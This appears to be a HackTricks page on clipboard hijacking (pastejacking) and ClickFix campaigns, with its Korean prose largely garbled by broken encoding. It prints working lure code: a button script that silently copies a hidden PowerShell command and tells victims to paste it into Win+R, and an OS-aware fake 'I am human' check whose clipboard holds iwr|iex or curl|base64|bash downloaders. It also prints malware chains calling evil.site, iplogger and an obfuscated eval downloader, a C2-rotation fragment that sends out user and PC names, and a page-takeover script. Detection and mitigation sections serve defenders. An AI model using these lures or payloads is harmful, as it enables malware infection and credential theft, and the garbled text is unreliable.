Clipboard Hijacking (Pastejacking) Attacks
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.
โ์ง์ ๋ณต์ฌํ์ง ์์ ๊ฒ์ ์ ๋ ๋ถ์ฌ๋ฃ์ง ๋ง๋ผ.โ โ ์ค๋๋ ์กฐ์ธ์ด์ง๋ง ์ฌ์ ํ ์ ํจํ๋ค
Overview
Clipboard hijacking โ also known as pastejacking โ ์ฌ์ฉ์๊ฐ ๋ช ๋ น์ ์์ธํ ํ์ธํ์ง ์๊ณ ์ต๊ด์ ์ผ๋ก ๋ณต์ฌยท๋ถ์ฌ๋ฃ๊ธฐํ๋ค๋ ์ ์ ์ ์ฉํ๋ค. ์ ์ฑ ์นํ์ด์ง(๋๋ JavaScript ์คํ์ด ๊ฐ๋ฅํ Electron ๋๋ Desktop ์ ํ๋ฆฌ์ผ์ด์ ๊ณผ ๊ฐ์ ์ด๋ค ์ปจํ ์คํธ)๋ ๊ณต๊ฒฉ์๊ฐ ์ ์ดํ๋ ํ ์คํธ๋ฅผ ํ๋ก๊ทธ๋๋ฐ์ ์ผ๋ก ์์คํ ํด๋ฆฝ๋ณด๋์ ๋ฃ๋๋ค. ํผํด์๋ ๋ณดํต ์ ๊ตํ ์ฌํ๊ณตํ์ ์ง์นจ์ผ๋ก ์ ๋๋์ด Win + R (Run dialog), Win + X (Quick Access / PowerShell)๋ฅผ ๋๋ฅด๊ฑฐ๋ ํฐ๋ฏธ๋์ ์ด์ด ํด๋ฆฝ๋ณด๋ ๋ด์ฉ์ ๋ถ์ฌ๋ฃ๊ธฐํ๊ณ ๊ทธ ์ฆ์ ์์์ ๋ช ๋ น์ด ์คํ๋๋ค.
ํ์ผ์ด ๋ค์ด๋ก๋๋์ง ์๊ณ ์ฒจ๋ถํ์ผ์ด ์ด๋ฆฌ์ง ์๊ธฐ ๋๋ฌธ์, ์ด ๊ธฐ๋ฒ์ ์ฒจ๋ถํ์ผ, ๋งคํฌ๋ก ๋๋ ์ง์ ๋ช ๋ น ์คํ์ ๋ชจ๋ํฐ๋งํ๋ ๋๋ถ๋ถ์ ์ด๋ฉ์ผ ๋ฐ ์น ์ฝํ ์ธ ๋ณด์ ์ ์ด๋ฅผ ์ฐํํ๋ค. ๋ฐ๋ผ์ ์ด ๊ณต๊ฒฉ์ NetSupport RAT, Latrodectus loader, Lumma Stealer์ ๊ฐ์ ๋ฒ์ฉ ๋ฉ์จ์ด ๊ณ์ด์ ๋ฐฐํฌํ๋ ํผ์ฑ ์บ ํ์ธ์์ ๋๋ฆฌ ์ฌ์ฉ๋๋ค.
Forced copy buttons and hidden payloads (macOS one-liners)
์ผ๋ถ macOS infostealer๋ ์ค์น ์ฌ์ดํธ(์: Homebrew)๋ฅผ ๋ณต์ ํ๊ณ ์ฌ์ฉ์๊ฐ ๋ณด์ด๋ ํ
์คํธ๋ง ์ ํํ์ง ๋ชปํ๋๋ก โCopyโ ๋ฒํผ ์ฌ์ฉ์ ๊ฐ์ ํ๋ค. ํด๋ฆฝ๋ณด๋ ํญ๋ชฉ์๋ ์์๋๋ ์ค์น ๋ช
๋ น๊ณผ ๋ค์ ์ด์ด๋ถ์ Base64 ํ์ด๋ก๋(์: ...; echo <b64> | base64 -d | sh)๊ฐ ํฌํจ๋์ด ์์ด, ํ ๋ฒ์ ๋ถ์ฌ๋ฃ๊ธฐ๋ก ๋ ๋ค ์คํ๋๋ฉฐ UI๋ ์ถ๊ฐ ๋จ๊ณ๋ฅผ ์จ๊ธด๋ค.
JavaScript ๊ฐ๋ ์ฆ๋ช (PoC)
<!-- Any user interaction (click) is enough to grant clipboard write permission in modern browsers -->
<button id="fix" onclick="copyPayload()">Fix the error</button>
<script>
function copyPayload() {
const payload = `powershell -nop -w hidden -enc <BASE64-PS1>`; // hidden PowerShell one-liner
navigator.clipboard.writeText(payload)
.then(() => alert('Now press Win+R , paste and hit Enter to fix the problem.'));
}
</script>
์ด์ ์บ ํ์ธ๋ค์ document.execCommand('copy')๋ฅผ ์ฌ์ฉํ๊ณ , ์ต์ ์บ ํ์ธ๋ค์ ๋น๋๊ธฐ Clipboard API (navigator.clipboard.writeText)์ ์์กดํฉ๋๋ค.
ClickFix / ClearFake ํ๋ฆ
- ์ฌ์ฉ์๊ฐ ์คํ ๋๋ฉ์ธ(typosquatted) ๋๋ ํ์ทจ๋ ์ฌ์ดํธ(์:
docusign.sa[.]com)์ ๋ฐฉ๋ฌธํฉ๋๋ค. - ์ฃผ์
๋ ClearFake JavaScript๊ฐ
unsecuredCopyToClipboard()ํฌํผ๋ฅผ ํธ์ถํ์ฌ ํด๋ฆฝ๋ณด๋์ Base64๋ก ์ธ์ฝ๋ฉ๋ PowerShell ์๋ผ์ด๋๋ฅผ ์กฐ์ฉํ ์ ์ฅํฉ๋๋ค. - HTML ์ง์นจ์ ํผํด์์๊ฒ ๋ค์์ ์ง์ํฉ๋๋ค: โWin + R ํค๋ฅผ ๋๋ฅด๊ณ , ๋ช ๋ น์ ๋ถ์ฌ๋ฃ์ ๋ค Enter๋ฅผ ๋๋ฌ ๋ฌธ์ ๋ฅผ ํด๊ฒฐํ์ธ์.โ
powershell.exe๊ฐ ์คํ๋์ด ํฉ๋ฒ์ ์ธ ์คํํ์ผ๊ณผ ์ ์ฑ DLL์ ํฌํจํ ์์นด์ด๋ธ๋ฅผ ๋ค์ด๋ก๋ํฉ๋๋ค(๊ณ ์ ์ ์ธ DLL sideloading).- ๋ก๋๋ ์ถ๊ฐ ์คํ ์ด์ง๋ฅผ ๋ณตํธํํ๊ณ , shellcode๋ฅผ ์ธ์ ์ ํ๋ฉฐ persistence๋ฅผ ์ค์นํฉ๋๋ค(์: scheduled task) โ ๊ฒฐ๊ตญ NetSupport RAT / Latrodectus / Lumma Stealer๊ฐ ์คํ๋ฉ๋๋ค.
NetSupport RAT ์ฒด์ธ ์์
powershell -nop -w hidden -enc <Base64>
# โ Decodes to:
Invoke-WebRequest -Uri https://evil.site/f.zip -OutFile %TEMP%\f.zip ;
Expand-Archive %TEMP%\f.zip -DestinationPath %TEMP%\f ;
%TEMP%\f\jp2launcher.exe # Sideloads msvcp140.dll
jp2launcher.exe(์ ์์ ์ธ Java WebStart)๋ ์์ ์ ๋๋ ํฐ๋ฆฌ์์msvcp140.dll์ ๊ฒ์ํฉ๋๋ค.- ํด๋น ์
์ฑ DLL์ GetProcAddress๋ก API๋ฅผ ๋์ ์ผ๋ก ํด๊ฒฐํ๊ณ , curl.exe๋ฅผ ํตํด ๋ ๊ฐ์ ๋ฐ์ด๋๋ฆฌ(
data_3.bin,data_4.bin)๋ฅผ ๋ค์ด๋ก๋ํ๋ฉฐ, ๋กค๋ง XOR ํค"https://google.com/"๋ก ์ด๋ฅผ ๋ณตํธํํ ๋ค ์ต์ข shellcode๋ฅผ ์ฃผ์ ํ๊ณ client32.exe (NetSupport RAT)๋ฅผC:\ProgramData\SecurityCheck_v1\์ ์์ถ ํด์ ํฉ๋๋ค.
Latrodectus Loader
powershell -nop -enc <Base64> # Cloud Identificator: 2031
- curl.exe๋ก
la.txt๋ฅผ ๋ค์ด๋ก๋ํจ - cscript.exe ๋ด๋ถ์์ JScript downloader๋ฅผ ์คํํจ
- MSI payload๋ฅผ ๊ฐ์ ธ์ด โ ์๋ช
๋ ์ ํ๋ฆฌ์ผ์ด์
์์
libcef.dll์ ๋๋กญํจ โ DLL sideloading โ shellcode โ Latrodectus.
Lumma Stealer via MSHTA
mshta https://iplogger.co/xxxx =+\\xxx
The mshta ํธ์ถ์ ์จ๊ฒจ์ง PowerShell ์คํฌ๋ฆฝํธ๋ฅผ ์คํํ์ฌ PartyContinued.exe๋ฅผ ๊ฐ์ ธ์ค๊ณ , Boat.pst(CAB)๋ฅผ ์ถ์ถํ๋ฉฐ, extrac32์ ํ์ผ ์ฐ๊ฒฐ์ ํตํด AutoIt3.exe๋ฅผ ์ฌ๊ตฌ์ฑํ ๋ค์ .a3x ์คํฌ๋ฆฝํธ๋ฅผ ์คํํด ๋ธ๋ผ์ฐ์ ์๊ฒฉ ์ฆ๋ช
์ sumeriavgv.digital๋ก ์ ์ถํฉ๋๋ค.
ClickFix: Clipboard โ PowerShell โ JS eval โ Startup LNK with rotating C2 (PureHVNC)
์ผ๋ถ ClickFix ์บ ํ์ธ์ ํ์ผ ๋ค์ด๋ก๋๋ฅผ ์์ ํ ๊ฑด๋๋ฐ๊ณ ํผํด์์๊ฒ WSH๋ฅผ ํตํด JavaScript๋ฅผ ๊ฐ์ ธ์ ์คํํ๋ oneโliner๋ฅผ ๋ถ์ฌ๋ฃ๋๋ก ์ง์ํ ๋ค ์ด๋ฅผ ์๊ตฌํ(persist)ํ๊ณ C2๋ฅผ ๋งค์ผ ํ์ ์ํต๋๋ค. ๊ด์ฐฐ๋ ์์ ์ฒด์ธ:
powershell -c "$j=$env:TEMP+'\a.js';sc $j 'a=new
ActiveXObject(\"MSXML2.XMLHTTP\");a.open(\"GET\",\"63381ba/kcilc.ellrafdlucolc//:sptth\".split(\"\").reverse().join(\"\"),0);a.send();eval(a.responseText);';wscript $j" Prะตss Entะตr
ํต์ฌ ํน์ฑ
- ํผ์์ ์ธ ๊ฒ์ฌ๋ฅผ ๋ฌด๋ ฅํํ๊ธฐ ์ํด ์คํ(runtime) ์ ์ญ์์ผ๋ก ๋ณต์๋๋ ๋๋ ํ๋ URL.
- JavaScript๋ Startup LNK (WScript/CScript)๋ฅผ ํตํด ์ง์์ฑ์ ํ๋ณดํ๊ณ , ํ์ฌ ๋ ์ง์ ๋ฐ๋ผ C2๋ฅผ ์ ํํ์ฌ ๋น ๋ฅธ domain rotation์ ๊ฐ๋ฅํ๊ฒ ํจ.
๋ ์ง๋ณ๋ก C2s๋ฅผ ํ์ ์ํค๋ ๋ฐ ์ฌ์ฉ๋๋ Minimal JS fragment:
function getURL() {
var C2_domain_list = ['stathub.quest','stategiq.quest','mktblend.monster','dsgnfwd.xyz','dndhub.xyz'];
var current_datetime = new Date().getTime();
var no_days = getDaysDiff(0, current_datetime);
return 'https://'
+ getListElement(C2_domain_list, no_days)
+ '/Y/?t=' + current_datetime
+ '&v=5&p=' + encodeURIComponent(user_name + '_' + pc_name + '_' + first_infection_datetime);
}
๋ค์ ๋จ๊ณ์์๋ ์ผ๋ฐ์ ์ผ๋ก persistence๋ฅผ ํ๋ฆฝํ๊ณ RAT(์: PureHVNC)์ ๊ฐ์ ธ์ค๋ loader๋ฅผ ๋ฐฐํฌํ๋ฉฐ, ์ข ์ข TLS๋ฅผ ํ๋์ฝ๋๋ certificate์ pinningํ๊ณ ํธ๋ํฝ์ chunkingํฉ๋๋ค.
Detection ideas specific to this variant
- ํ๋ก์ธ์ค ํธ๋ฆฌ:
explorer.exeโpowershell.exe -cโwscript.exe <temp>\a.js(๋๋cscript.exe). - ์์ ํญ๋ชฉ ์ํฐํฉํธ:
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup์ ์๋ LNK๊ฐ%TEMP%/%APPDATA%ํ์์ JS ๊ฒฝ๋ก๋ก WScript/CScript๋ฅผ ํธ์ถํจ. - Registry/RunMRU ๋ฐ ๋ช
๋ น์ค ํ
๋ ๋ฉํธ๋ฆฌ์
.split('').reverse().join('')๋๋eval(a.responseText)ํฌํจ. - ๊ธด ๋ช
๋ น์ค์ ํผํ๊ธฐ ์ํด ํฐ stdin ํ์ด๋ก๋๋ก ๊ธด ์คํฌ๋ฆฝํธ๋ฅผ ๊ณต๊ธํ๋ ๋ฐ๋ณต์ ์ธ
powershell -NoProfile -NonInteractive -Command -. - ์ดํ์ LOLBins๋ฅผ ์คํํ๋ Scheduled Tasks, ์: updater์ฒ๋ผ ๋ณด์ด๋ ์์
/๊ฒฝ๋ก(์:
\GoogleSystem\GoogleUpdater) ์๋์์regsvr32 /s /i:--type=renderer "%APPDATA%\Microsoft\SystemCertificates\<name>.dll"๊ฐ์ ํธ์ถ.
Threat hunting
.../Y/?t=<epoch>&v=5&p=<encoded_user_pc_firstinfection>ํจํด์ ๊ฐ์ง ์ผ๋ณ ํ์ ํ๋ C2 ํธ์คํธ๋ค์ ๋ฐ URL.- clipboard write ์ด๋ฒคํธ ๋ค์์ Win+R paste๊ฐ ๋ฐ์ํ๊ณ ์ฆ์
powershell.exe๊ฐ ์คํ๋๋ ํ๋ฆ์ ์๊ด๊ด๊ณ ๋ถ์.
Blue-teams can combine clipboard, process-creation and registry telemetry to pinpoint pastejacking abuse:
- Windows Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU๋ Win + R ๋ช ๋ น์ ํ์คํ ๋ฆฌ๋ฅผ ๋ณด๊ด โ ๋น์ ์์ ์ธ Base64 / ๋๋ ํ๋ ์ํธ๋ฆฌ๋ฅผ ์ฐพ์ผ์ธ์. - Security Event ID 4688 (Process Creation)์์
ParentImage==explorer.exe์ด๊ณNewProcessName์ด {powershell.exe,wscript.exe,mshta.exe,curl.exe,cmd.exe}์ ํฌํจ๋๋ ๊ฒฝ์ฐ. - Event ID 4663: ์์ฌ์ค๋ฌ์ด 4688 ์ด๋ฒคํธ ์ง์ ์
%LocalAppData%\Microsoft\Windows\WinX\๋๋ ์์ ํด๋์์์ ํ์ผ ์์ฑ ์ด๋ฒคํธ. - EDR clipboard sensors(์กด์ฌํ๋ ๊ฒฝ์ฐ) โ
Clipboard Write์งํ ์๋ก์ด PowerShell ํ๋ก์ธ์ค๊ฐ ์์ฑ๋๋ ๊ฒ์ ์๊ด๊ด๊ณ ๋ถ์.
IUAM-style verification pages (ClickFix Generator): clipboard copy-to-console + OS-aware payloads
์ต๊ทผ ์บ ํ์ธ๋ค์ ๊ฐ์ง CDN/browser verification ํ์ด์ง(โJust a momentโฆโ, IUAM-style)๋ฅผ ๋๋์ผ๋ก ์์ฑํ์ฌ ์ฌ์ฉ์๊ฐ ์์ ์ clipboard์์ OS๋ณ ๋ช ๋ น์ ๋ณต์ฌํด ๋ค์ดํฐ๋ธ ์ฝ์๋ก ๋ถ์ฌ๋ฃ๋๋ก ์ ๋ํฉ๋๋ค. ์ด๊ฒ์ ์คํ์ ๋ธ๋ผ์ฐ์ ์๋๋ฐ์ค ๋ฐ์ผ๋ก ์ ํํ๋ฉฐ Windows์ macOS ์ ๋ฐ์์ ๋์ํฉ๋๋ค.
๋น๋๊ฐ ์์ฑํ ํ์ด์ง์ ์ฃผ์ ํน์ฑ
navigator.userAgent๋ฅผ ํตํ OS ํ์ง๋ก ํ์ด๋ก๋๋ฅผ ๋ง์ถค (Windows PowerShell/CMD vs. macOS Terminal). ์ง์๋์ง ์๋ OS์๋ ์ฐฉ์ ์ ์ง๋ฅผ ์ํด ์ ํ์ decoys/no-ops ์ ๊ณต.- ๋ณด์ด๋ ํ ์คํธ์ clipboard ๋ด์ฉ์ด ๋ค๋ฅผ ์ ์๋ ์ํฉ์์ ์ฒดํฌ๋ฐ์ค/Copy ๊ฐ์ ์ ์ UI ๋์์ผ๋ก ์๋ clipboard-copy ์ํ.
- ๋ชจ๋ฐ์ผ ์ฐจ๋จ ๋ฐ ๋จ๊ณ๋ณ ์๋ด๊ฐ ์๋ ํ์ค๋ฒ: Windows โ Win+RโpasteโEnter; macOS โ open TerminalโpasteโEnter.
- Optional obfuscation๊ณผ ๋จ์ผ ํ์ผ injector๋ก ์์๋ ์ฌ์ดํธ์ DOM์ Tailwind-styled verification UI๋ก ๋ฎ์ด์ฐ๊ธฐ (์ ๋๋ฉ์ธ ๋ฑ๋ก ๋ถํ์).
Example: clipboard mismatch + OS-aware branching
<div class="space-y-2">
<label class="inline-flex items-center space-x-2">
<input id="chk" type="checkbox" class="accent-blue-600"> <span>I am human</span>
</label>
<div id="tip" class="text-xs text-gray-500">If the copy fails, click the checkbox again.</div>
</div>
<script>
const ua = navigator.userAgent;
const isWin = ua.includes('Windows');
const isMac = /Mac|Macintosh|Mac OS X/.test(ua);
const psWin = `powershell -nop -w hidden -c "iwr -useb https://example[.]com/cv.bat|iex"`;
const shMac = `nohup bash -lc 'curl -fsSL https://example[.]com/p | base64 -d | bash' >/dev/null 2>&1 &`;
const shown = 'copy this: echo ok'; // benign-looking string on screen
const real = isWin ? psWin : (isMac ? shMac : 'echo ok');
function copyReal() {
// UI shows a harmless string, but clipboard gets the real command
navigator.clipboard.writeText(real).then(()=>{
document.getElementById('tip').textContent = 'Now press Win+R (or open Terminal on macOS), paste and hit Enter.';
});
}
document.getElementById('chk').addEventListener('click', copyReal);
</script>
์ด๊ธฐ ์คํ์ macOS persistence
nohup bash -lc '<fetch | base64 -d | bash>' >/dev/null 2>&1 &๋ฅผ ์ฌ์ฉํ์ฌ ํฐ๋ฏธ๋์ด ๋ซํ ํ์๋ ์คํ์ด ๊ณ์๋๋๋ก ํ์ฌ ๋์ ๋๋ ํ์ ์ ์ค์ ๋๋ค.
์์๋ ์ฌ์ดํธ์์ In-place page takeover
<script>
(async () => {
const html = await (await fetch('https://attacker[.]tld/clickfix.html')).text();
document.documentElement.innerHTML = html; // overwrite DOM
const s = document.createElement('script');
s.src = 'https://cdn.tailwindcss.com'; // apply Tailwind styles
document.head.appendChild(s);
})();
</script>
Detection & hunting ideas specific to IUAM-style lures
- Web: Clipboard API๋ฅผ verification widgets์ ๋ฐ์ธ๋ฉํ๋ ํ์ด์ง; ํ์๋ ํ
์คํธ์ ํด๋ฆฝ๋ณด๋ ํ์ด๋ก๋์ ๋ถ์ผ์น;
navigator.userAgent๋ถ๊ธฐ; ์์ฌ์ค๋ฌ์ด ์ปจํ ์คํธ์์ Tailwind + single-page ๊ต์ฒด. - Windows endpoint: ๋ธ๋ผ์ฐ์ ์ํธ์์ฉ ์งํ
explorer.exeโpowershell.exe/cmd.exe์คํ;%TEMP%์์ ์คํ๋ batch/MSI ์ค์น ํ๋ก๊ทธ๋จ. - macOS endpoint: Terminal/iTerm์ด ๋ธ๋ผ์ฐ์ ์ด๋ฒคํธ ๊ทผ์ฒ์์
nohup๊ณผ ํจ๊ปbash/curl/base64 -d๋ฅผ ์คํ; ํฐ๋ฏธ๋ ์ข ๋ฃ ํ์๋ ์ด์๋จ๋ ๋ฐฑ๊ทธ๋ผ์ด๋ ์์ . RunMRUWin+R ๊ธฐ๋ก ๋ฐ ํด๋ฆฝ๋ณด๋ ์ฐ๊ธฐ์ ์ดํ ์ฝ์ ํ๋ก์ธ์ค ์์ฑ ๊ฐ์ ์๊ด๊ด๊ณ ํ์ธ.
See also for supporting techniques
์ํ ์กฐ์น
- ๋ธ๋ผ์ฐ์ ๊ฐํ โ ํด๋ฆฝ๋ณด๋ ์ฐ๊ธฐ ์ ๊ทผ(
dom.events.asyncClipboard.clipboardItem๋ฑ)์ ๋นํ์ฑํํ๊ฑฐ๋ ์ฌ์ฉ์ ์ ์ค์ฒ๋ฅผ ์๊ตฌ. - ๋ณด์ ์ธ์ ๊ต์ก โ ๋ฏผ๊ฐํ ๋ช ๋ น์ ์ง์ ํ์ดํํ๊ฑฐ๋ ๋จผ์ ํ ์คํธ ํธ์ง๊ธฐ์ ๋ถ์ฌ๋ฃ๋๋ก ๊ต์ก.
- PowerShell Constrained Language Mode / Execution Policy + Application Control์ ์ฌ์ฉํด ์์์ one-liners ์ฐจ๋จ.
- ๋คํธ์ํฌ ์ ์ด โ ์๋ ค์ง pastejacking ๋ฐ malware C2 ๋๋ฉ์ธ์ผ๋ก์ ์์๋ฐ์ด๋ ์์ฒญ ์ฐจ๋จ.
๊ด๋ จ ํธ๋ฆญ
- Discord Invite Hijacking์ ์ฌ์ฉ์๋ฅผ ์ ์ฑ ์๋ฒ๋ก ์ ์ธํ ๋ค ๋์ผํ ClickFix ์ ๊ทผ์ ์ ์ฉํ๋ ๊ฒฝ์ฐ๊ฐ ๋ง๋ค:
์ฐธ๊ณ ์๋ฃ
- Fix the Click: Preventing the ClickFix Attack Vector
- Pastejacking PoC โ GitHub
- Check Point Research โ Under the Pure Curtain: From RAT to Builder to Coder
- The ClickFix Factory: First Exposure of IUAM ClickFix Generator
- 2025, the year of the Infostealer
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.


